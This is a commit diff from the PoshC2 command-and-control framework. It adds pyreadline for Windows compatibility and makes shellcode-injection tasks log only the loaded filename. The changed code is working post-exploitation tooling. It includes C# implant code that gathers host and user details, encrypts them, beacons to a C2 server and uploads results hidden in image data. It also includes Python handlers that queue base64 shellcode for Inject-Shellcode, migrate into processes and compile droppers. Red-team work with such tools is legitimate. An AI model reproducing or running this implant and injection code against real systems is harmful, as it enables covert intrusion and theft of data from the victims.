Use pyreadline for Windows compatibility and when injecting shellcode log filename
parent
ae3c5ed3cf
commit
0aaa5ce53c
13
Config.py
13
Config.py
|
@ -1,4 +1,5 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
import os
|
||||||
from UrlConfig import UrlConfig
|
from UrlConfig import UrlConfig
|
||||||
|
|
||||||
HOST_NAME = '0.0.0.0'
|
HOST_NAME = '0.0.0.0'
|
||||||
|
@ -56,12 +57,12 @@ ServerHeader = "Apache"
|
||||||
Insecure = "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}"
|
Insecure = "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}"
|
||||||
|
|
||||||
# DO NOT CHANGE #
|
# DO NOT CHANGE #
|
||||||
FilesDirectory = "%sFiles/" % POSHDIR
|
FilesDirectory = "%sFiles%s" % (POSHDIR, os.sep)
|
||||||
PayloadsDirectory = "%spayloads/" % ROOTDIR
|
PayloadsDirectory = "%spayloads%s" % (ROOTDIR, os.sep)
|
||||||
ModulesDirectory = "%sModules/" % POSHDIR
|
ModulesDirectory = "%sModules%s" % (POSHDIR, os.sep)
|
||||||
DownloadsDirectory = "%sdownloads/" % ROOTDIR
|
DownloadsDirectory = "%sdownloads%s" % (ROOTDIR, os.sep)
|
||||||
ReportsDirectory = "%sreports/" % ROOTDIR
|
ReportsDirectory = "%sreports%s" % (ROOTDIR, os.sep)
|
||||||
Database = "%s/PowershellC2.SQLite" % ROOTDIR
|
Database = "%s%sPowershellC2.SQLite" % (ROOTDIR, os.sep)
|
||||||
|
|
||||||
# DO NOT CHANGE #
|
# DO NOT CHANGE #
|
||||||
# These rules aren't needed as you'll find them auto-generated within the project folder now.
|
# These rules aren't needed as you'll find them auto-generated within the project folder now.
|
||||||
|
|
4
Core.py
4
Core.py
|
@ -1,9 +1,9 @@
|
||||||
#!/usr/bin/python
|
#!/usr/bin/python
|
||||||
|
|
||||||
import zlib, argparse, os, re, datetime, time, base64, string, random, codecs, glob
|
import zlib, argparse, os, re, datetime, time, base64, string, random, codecs, glob, readline, pyreadline.rlmain
|
||||||
from Config import HTTPResponses, POSHDIR, PayloadsDirectory
|
from Config import HTTPResponses, POSHDIR, PayloadsDirectory
|
||||||
from Utils import randomuri
|
from Utils import randomuri
|
||||||
from TabComplete import readline, tabCompleter
|
from TabComplete import tabCompleter
|
||||||
from Help import COMMANDS
|
from Help import COMMANDS
|
||||||
|
|
||||||
def default_response():
|
def default_response():
|
||||||
|
|
|
@ -77,7 +77,7 @@ public class Program
|
||||||
x.Headers.Add("Referrer", "#REPLACEREFERER#");
|
x.Headers.Add("Referrer", "#REPLACEREFERER#");
|
||||||
|
|
||||||
if (null != cookie)
|
if (null != cookie)
|
||||||
x.Headers.Add(System.Net.HttpRequestHeader.Cookie, $"SessionID={cookie}");
|
x.Headers.Add(System.Net.HttpRequestHeader.Cookie, String.Format("SessionID={0}", cookie));
|
||||||
|
|
||||||
return x;
|
return x;
|
||||||
}
|
}
|
||||||
|
@ -188,7 +188,7 @@ public class Program
|
||||||
var arch = System.Environment.GetEnvironmentVariable("PROCESSOR_ARCHITECTURE");
|
var arch = System.Environment.GetEnvironmentVariable("PROCESSOR_ARCHITECTURE");
|
||||||
int pid = Process.GetCurrentProcess().Id;
|
int pid = Process.GetCurrentProcess().Id;
|
||||||
Environment.CurrentDirectory = Environment.GetEnvironmentVariable("windir");
|
Environment.CurrentDirectory = Environment.GetEnvironmentVariable("windir");
|
||||||
var o = $"{dn};{u};{cn};{arch};{pid};#REPLACEBASEURL#";
|
var o = String.Format("{0};{1};{2};{3};{4};#REPLACEBASEURL#", dn, u, cn, arch, pid);
|
||||||
String key = "#REPLACEKEY#", baseURL = "#REPLACEBASEURL#", s = "#REPLACESTARTURL#";
|
String key = "#REPLACEKEY#", baseURL = "#REPLACEBASEURL#", s = "#REPLACESTARTURL#";
|
||||||
|
|
||||||
var primer = GetWebRequest(Encryption(key, o)).DownloadString(s);
|
var primer = GetWebRequest(Encryption(key, o)).DownloadString(s);
|
||||||
|
@ -331,7 +331,7 @@ public class Program
|
||||||
internal static String GenerateUrl()
|
internal static String GenerateUrl()
|
||||||
{
|
{
|
||||||
string URL = _stringnewURLS[_rnd.Next(_stringnewURLS.Count)];
|
string URL = _stringnewURLS[_rnd.Next(_stringnewURLS.Count)];
|
||||||
return $"{_baseUrl}/{URL}{Guid.NewGuid()}/?{_randomURI}";
|
return String.Format("{0}/{1}{2}/?{3}", _baseUrl, URL, Guid.NewGuid(), _randomURI);
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
@ -502,7 +502,7 @@ public class Program
|
||||||
beacontime = Parse_Beacon_Time(mch.Groups["t"].Value, mch.Groups["u"].Value);
|
beacontime = Parse_Beacon_Time(mch.Groups["t"].Value, mch.Groups["u"].Value);
|
||||||
}
|
}
|
||||||
else
|
else
|
||||||
output.AppendLine($@"[X] Invalid time ""{c}""");
|
output.AppendLine(String.Format(@"[X] Invalid time ""{0}""", c));
|
||||||
}
|
}
|
||||||
|
|
||||||
output.AppendLine(strOutput.ToString());
|
output.AppendLine(strOutput.ToString());
|
||||||
|
@ -519,7 +519,7 @@ public class Program
|
||||||
catch (Exception e)
|
catch (Exception e)
|
||||||
{
|
{
|
||||||
var task = Encryption(Key, "Error");
|
var task = Encryption(Key, "Error");
|
||||||
var eroutput = Encryption(Key, $"Error: {output.ToString()} {e}", true);
|
var eroutput = Encryption(Key, String.Format("Error: {0} {1}", output.ToString(), e), true);
|
||||||
var outputBytes = System.Convert.FromBase64String(eroutput);
|
var outputBytes = System.Convert.FromBase64String(eroutput);
|
||||||
var sendBytes = ImgGen.GetImgData(outputBytes);
|
var sendBytes = ImgGen.GetImgData(outputBytes);
|
||||||
GetWebRequest(task).UploadData(UrlGen.GenerateUrl(), sendBytes);
|
GetWebRequest(task).UploadData(UrlGen.GenerateUrl(), sendBytes);
|
||||||
|
|
|
@ -1,6 +1,6 @@
|
||||||
#!/usr/bin/python
|
#!/usr/bin/python
|
||||||
|
|
||||||
import sys, re, os, readline, time, subprocess, traceback, signal, argparse
|
import sys, re, os, time, subprocess, traceback, signal, argparse, readline, pyreadline.rlmain
|
||||||
from sqlite3 import Error
|
from sqlite3 import Error
|
||||||
from Help import logopic, PRECOMMANDS, UXCOMMANDS, SHARPCOMMANDS, COMMANDS, pre_help
|
from Help import logopic, PRECOMMANDS, UXCOMMANDS, SHARPCOMMANDS, COMMANDS, pre_help
|
||||||
from DB import update_item, get_c2server_all, get_implants_all, get_tasks, get_implantdetails, new_urldetails
|
from DB import update_item, get_c2server_all, get_implants_all, get_tasks, get_implantdetails, new_urldetails
|
||||||
|
|
17
PSHandler.py
17
PSHandler.py
|
@ -1,4 +1,4 @@
|
||||||
import base64, re, traceback, os, sys
|
import base64, re, traceback, os, sys, readline, pyreadline.rlmain
|
||||||
from Alias import ps_alias
|
from Alias import ps_alias
|
||||||
from Colours import Colours
|
from Colours import Colours
|
||||||
from Utils import randomuri, validate_sleep_time
|
from Utils import randomuri, validate_sleep_time
|
||||||
|
@ -10,7 +10,7 @@ from Core import readfile_with_completion, filecomplete
|
||||||
from Opsec import ps_opsec
|
from Opsec import ps_opsec
|
||||||
from Payloads import Payloads
|
from Payloads import Payloads
|
||||||
from Utils import argp, load_file, gen_key
|
from Utils import argp, load_file, gen_key
|
||||||
from TabComplete import readline, tabCompleter
|
from TabComplete import tabCompleter
|
||||||
|
|
||||||
def handle_ps_command(command, user, randomuri, startup, createdaisypayload, createproxypayload):
|
def handle_ps_command(command, user, randomuri, startup, createdaisypayload, createproxypayload):
|
||||||
try:
|
try:
|
||||||
|
@ -406,7 +406,7 @@ def handle_ps_command(command, user, randomuri, startup, createdaisypayload, cre
|
||||||
shellcodefile = load_file(path)
|
shellcodefile = load_file(path)
|
||||||
if shellcodefile != None:
|
if shellcodefile != None:
|
||||||
arch = "64"
|
arch = "64"
|
||||||
new_task("$Shellcode%s=\"%s\"" % (arch,base64.b64encode(shellcodefile)), user, randomuri)
|
new_task("$Shellcode%s=\"%s\" #%s" % (arch,base64.b64encode(shellcodefile), os.path.basename(path)), user, randomuri)
|
||||||
new_task("Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String($Shellcode%s))%s" % (arch, params), user, randomuri)
|
new_task("Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String($Shellcode%s))%s" % (arch, params), user, randomuri)
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
print ("Error loading file: %s" % e)
|
print ("Error loading file: %s" % e)
|
||||||
|
@ -471,13 +471,16 @@ def migrate(randomuri, user, params=""):
|
||||||
arch = "86"
|
arch = "86"
|
||||||
|
|
||||||
if implant_comms == "Normal":
|
if implant_comms == "Normal":
|
||||||
shellcodefile = load_file("%spayloads/Posh_v4_x%s_Shellcode.bin" % (ROOTDIR,arch))
|
path = "%spayloads/Posh_v4_x%s_Shellcode.bin" % (ROOTDIR,arch)
|
||||||
|
shellcodefile = load_file(path)
|
||||||
elif implant_comms == "Daisy":
|
elif implant_comms == "Daisy":
|
||||||
daisyname = raw_input("Name required: ")
|
daisyname = raw_input("Name required: ")
|
||||||
shellcodefile = load_file("%spayloads/%sPosh_v4_x%s_Shellcode.bin" % (ROOTDIR,daisyname,arch))
|
path = "%spayloads/%sPosh_v4_x%s_Shellcode.bin" % (ROOTDIR,daisyname,arch)
|
||||||
|
shellcodefile = load_file(path)
|
||||||
elif implant_comms == "Proxy":
|
elif implant_comms == "Proxy":
|
||||||
shellcodefile = load_file("%spayloads/ProxyPosh_v4_x%s_Shellcode.bin" % (ROOTDIR,arch))
|
path = "%spayloads/ProxyPosh_v4_x%s_Shellcode.bin" % (ROOTDIR,arch)
|
||||||
|
shellcodefile = load_file(path)
|
||||||
|
|
||||||
check_module_loaded("Inject-Shellcode.ps1", randomuri, user)
|
check_module_loaded("Inject-Shellcode.ps1", randomuri, user)
|
||||||
new_task("$Shellcode%s=\"%s\"" % (arch,base64.b64encode(shellcodefile)), user, randomuri)
|
new_task("$Shellcode%s=\"%s\" #%s" % (arch,base64.b64encode(shellcodefile), os.path.basename(path)), user, randomuri)
|
||||||
new_task("Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String($Shellcode%s))%s" % (arch, params), user, randomuri)
|
new_task("Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String($Shellcode%s))%s" % (arch, params), user, randomuri)
|
|
@ -190,7 +190,8 @@ class Payloads(object):
|
||||||
output_file.write(cs9)
|
output_file.write(cs9)
|
||||||
output_file.close()
|
output_file.close()
|
||||||
if os.name == 'nt':
|
if os.name == 'nt':
|
||||||
compile = "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe %s%sdropper.cs -o %s%sdropper_cs.exe" % (self.BaseDirectory, name, self.BaseDirectory, name)
|
compile = "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe -target:library -out:%s%sdropper_cs.dll %s%sdropper.cs " % (self.BaseDirectory, name, self.BaseDirectory, name)
|
||||||
|
compileexe = "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe -target:exe -out:%s%sdropper_cs.exe %s%sdropper.cs " % (self.BaseDirectory, name, self.BaseDirectory, name)
|
||||||
else:
|
else:
|
||||||
compile = "mono-csc %s%sdropper.cs -out:%s%sdropper_cs.dll -target:library -warn:2" % (self.BaseDirectory,name,self.BaseDirectory,name)
|
compile = "mono-csc %s%sdropper.cs -out:%s%sdropper_cs.dll -target:library -warn:2" % (self.BaseDirectory,name,self.BaseDirectory,name)
|
||||||
compileexe = "mono-csc %s%sdropper.cs -out:%s%sdropper_cs.exe -target:exe -warn:2" % (self.BaseDirectory,name,self.BaseDirectory,name)
|
compileexe = "mono-csc %s%sdropper.cs -out:%s%sdropper_cs.exe -target:exe -warn:2" % (self.BaseDirectory,name,self.BaseDirectory,name)
|
||||||
|
|
|
@ -75,7 +75,7 @@ def handle_sharp_command(command, user, randomuri, startup):
|
||||||
try:
|
try:
|
||||||
shellcodefile = load_file(path)
|
shellcodefile = load_file(path)
|
||||||
if shellcodefile != None:
|
if shellcodefile != None:
|
||||||
new_task("run-exe Core.Program Core Inject-Shellcode %s%s" % (base64.b64encode(shellcodefile),params), user, randomuri)
|
new_task("run-exe Core.Program Core Inject-Shellcode %s%s #%s" % (base64.b64encode(shellcodefile),params, os.path.basename(path)), user, randomuri)
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
print ("Error loading file: %s" % e)
|
print ("Error loading file: %s" % e)
|
||||||
|
|
||||||
|
|
|
@ -1,6 +1,6 @@
|
||||||
#!/usr/bin/python
|
#!/usr/bin/python
|
||||||
|
|
||||||
import os, sys, readline, glob
|
import os, sys, readline, pyreadline.rlmain, glob
|
||||||
|
|
||||||
class tabCompleter(object):
|
class tabCompleter(object):
|
||||||
"""
|
"""
|
||||||
|
|
9
Tasks.py
9
Tasks.py
|
@ -19,12 +19,9 @@ def newTask(path):
|
||||||
user_command = command
|
user_command = command
|
||||||
hostinfo = DB.get_hostinfo(RandomURI)
|
hostinfo = DB.get_hostinfo(RandomURI)
|
||||||
now = datetime.datetime.now()
|
now = datetime.datetime.now()
|
||||||
if (command.lower().startswith("$shellcode64")) or (command.lower().startswith("$shellcode64")) :
|
if (command.lower().startswith("$shellcode64")) or (command.lower().startswith("$shellcode86") or command.lower().startswith("run-exe core.program core inject-shellcode")) :
|
||||||
user_command = command[0:150]+"......TRUNCATED......"+command[-80:]
|
user_command = "Inject Shellcode: %s" % command[command.index("#") + 1:]
|
||||||
elif (command.lower().startswith("run-exe core.program core inject-shellcode")) :
|
command = command[:command.index("#")]
|
||||||
user_command = command[0:150]+"......TRUNCATED......"+command[-80:]
|
|
||||||
elif (command.lower().startswith("$shellcode86")) or (command.lower().startswith("$shellcode86")) :
|
|
||||||
user_command = command[0:150]+"......TRUNCATED......"+command[-80:]
|
|
||||||
elif (command.lower().startswith('upload-file')):
|
elif (command.lower().startswith('upload-file')):
|
||||||
filepath = command.replace('upload-file', '')
|
filepath = command.replace('upload-file', '')
|
||||||
if ";" in filepath:
|
if ";" in filepath:
|
||||||
|
|
|
@ -14,6 +14,8 @@ Add a configurable jitter to all implants
|
||||||
Update the notifications config if it is changed in the Config.py
|
Update the notifications config if it is changed in the Config.py
|
||||||
Add NotificationsProjectName in Config.py which is displayed in notifications message
|
Add NotificationsProjectName in Config.py which is displayed in notifications message
|
||||||
Add fpc script which searches the Posh DB for a particular command
|
Add fpc script which searches the Posh DB for a particular command
|
||||||
|
Use pyreadline for Windows compatibility
|
||||||
|
Modify InjectShellcode logged command to remove base64 encoded shellcode and instead just log loaded filename
|
||||||
|
|
||||||
4.8 (13/02/19)
|
4.8 (13/02/19)
|
||||||
==============
|
==============
|
||||||
|
|
|
@ -1,4 +1,5 @@
|
||||||
pyopenssl
|
pyopenssl
|
||||||
pandas
|
pandas
|
||||||
pyttsx3
|
pyttsx3
|
||||||
pycrypto
|
pycrypto
|
||||||
|
pyreadline
|
Loading…
Reference in New Issue